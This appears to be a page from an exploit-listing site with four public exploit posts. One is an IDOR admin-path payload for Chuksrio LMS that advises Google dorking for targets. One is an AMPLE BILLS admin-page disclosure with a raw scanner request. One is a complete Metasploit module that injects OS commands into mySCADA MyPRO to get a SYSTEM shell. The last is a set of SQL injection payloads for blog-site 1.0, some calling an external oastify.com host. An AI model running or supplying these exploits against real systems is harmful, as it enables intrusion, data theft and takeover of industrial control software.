Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Chuksrio LMS v2.9 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /admin/header.php?captcha [+] https://www/127.0.0.1/mefkayschools.org/admin/header.php?captcha Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : AMPLE BILLS v1.0 Administrative Page Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Vulnerability description : An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <?php if (!isset($_SESSION["authenticated"])) { header("Location: auth.php"); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. The correct code would be <?php if (!isset($_SESSION[auth])) { header("Location: auth.php"); exit(); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  [+] infected item : /pass. [+] Attack details : Form action='' Request GET /ample/index.php?page=add_expense_catagory HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://127.0.0.1/ample/index.php Acunetix-Aspect: enabled Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: PHPSESSID=d79a5fbv977hkq34ib65osmk8u Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Response HTTP/1.1 302 Found Date: Sun, 28 Jul 2024 22:44:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: login.php Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 31539 [+] The impact of this vulnerability : depends on the affected web application. [+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)', 'Description' => %q{ Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA. The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module 'References' => [ [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'], [ 'CVE', '2023-28384'] ], 'DisclosureDate' => '2022-09-22', 'Platform' => 'win', 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows_Fetch', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' }, 'Type' => :win_fetch } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new( 'USERNAME', [ true, 'The username to authenticate with (default: admin)', 'admin' ] ), OptString.new( 'PASSWORD', [ true, 'The password to authenticate with (default: admin)', 'admin' ] ), OptString.new( 'TARGETURI', [ true, 'The URI for the MyPRO web interface', '/' ] ) ] ) end # Determine if the MyPRO instance runs a vulnerable version def check begin res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), 'vars_post' => { 't' => '98' } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError return CheckCode::Unknown end if res && res.code == 200 data = res.get_json_document version = data['V'] if version.nil? return CheckCode::Unknown else vprint_status('Version retrieved: ' + version) end if Rex::Version.new(version) <= Rex::Version.new('8.28') return CheckCode::Appears else return CheckCode::Safe end else return CheckCode::Unknown end end def exploit execute_command(payload.encoded) end def execute_command(cmd) print_status('Checking credentials...') check_auth print_status('Sending command injection...') exec_mypro(cmd) print_status('Exploit finished, check thy shell.') end # Check if credentials are working def check_auth res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sss2'), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } }) unless res fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') end case res.code when 200 print_good('Credentials are working.') when 401 fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?') else fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.') end end # Send command injection def exec_mypro(cmd) post_data = { 'type' => 'sendEmail', 'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}" } post_json = JSON.generate(post_data) res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'application/json', 'data' => post_json, 'uri' => normalize_uri(target_uri.path, 'sss2'), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } }) # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response. if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned. print_good('Command successfully executed, check your shell.') end end end </code></pre>

<pre><code>## Titles: blog-site-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 07/29/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14442/blog-site-using-phpmysql.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page=category&id=-7721' OR 5223=5223 AND 'yTLh'='yTLh Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=category&id=3'+(select load_file('\\\\ turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT 2233 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(2233=2233,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mgsn'='Mgsn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=category&id=3'+(select load_file('\\\\ turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT 5859 FROM (SELECT(SLEEP(7)))tvNV) AND 'ocCx'='ocCx Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: page=category&id=3'+(select load_file('\\\\ turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' UNION ALL SELECT CONCAT(0x7171717671,0x416d7442627944704b55554267774f596d766967615341654a4242745a45467a71494f73596f776b,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://www.patreon.com/posts/blog-site-1-0-108994688) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/07/blog-site-10-multiple-sqli.html) ## Time spent: 00:37:00 </code></pre>